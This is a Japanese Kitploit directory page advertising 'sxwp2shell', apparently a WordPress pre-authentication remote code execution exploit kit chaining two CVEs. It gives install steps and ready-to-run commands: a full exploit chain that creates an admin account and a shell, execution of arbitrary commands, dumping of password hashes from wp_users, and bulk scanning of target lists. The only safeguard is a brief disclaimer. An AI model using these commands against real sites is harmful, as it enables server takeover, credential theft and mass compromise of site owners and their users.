Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
sxwp2shell — WordPress wp2shell 認証前RCEエクスプロイトキット (CVE-2026-63030 + CVE-2026-60137) | Kitploit
ツール/GitHubGitHub/sentinelxofficial/sxwp2shell
ペネトレーションテストフレームワーク脆弱性スキャナーコード分析エクスプロイトウェブセキュリティ
GitHubsentinelxofficial/sxwp2shell

sxwp2shell

WordPress wp2shell 認証前RCEエクスプロイトキット (CVE-2026-63030 + CVE-2026-60137)

リポジトリを見る
11ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

/ / ____ / /()___ ___ / / | |/ / __ / _ / __ / / / __ / _ / / | / / / __/ / / / // / / / / / // | /_/_// //_/// //_/__//|_|

sxwp2shell — REST API バッチルート混乱(CVE-2026-63030)+ SQLインジェクション(CVE-2026-60137)を介した WordPress の認証前RCEエクスプロイト。

Affected: WP 6.9.0–6.9.4 / 7.0.0–7.0.1


インストール

root@kitploit:~
git clone https://github.com/SentinelXofficial/sxwp2shell
cd sxwp2shell
chmod +x sxwp2shell.py

Python 3.7+、標準ライブラリのみ — pip install は不要です。

使い方

Command説明
check <url>バージョン、バッチエンドポイント、ルート混乱、SQLi を検出
exploit <url>完全なRCEチェーン(SQLi → 管理者作成 → シェル)
read <url>ブラインドSQLiによるデータ抽出
scan <file>ファイルからターゲットを一括スキャンし、CSVをエクスポート
root@kitploit:~
python3 sxwp2shell.py check https://target.com
python3 sxwp2shell.py exploit https://target.com --cmd id
python3 sxwp2shell.py read https://target.com --query "SELECT user_pass FROM wp_users"
python3 sxwp2shell.py scan targets.txt -o results.csv

オプション

root@kitploit:~
--cmd CMD         Command to execute          (default: id)
--query QUERY     Custom SQL query
-k, --insecure    Skip SSL verification
--proxy PROXY     HTTP proxy
--timeout SEC     Request timeout              (default: 15)
--delay SEC       Delay between requests
--agent AGENT     Custom User-Agent
--no-color        Disable colored output
-o, --output      Save scan results to CSV

免責事項

認可されたセキュリティテストのみを対象としています。DISCLAIMER.md をお読みください。

ツールをダウンロード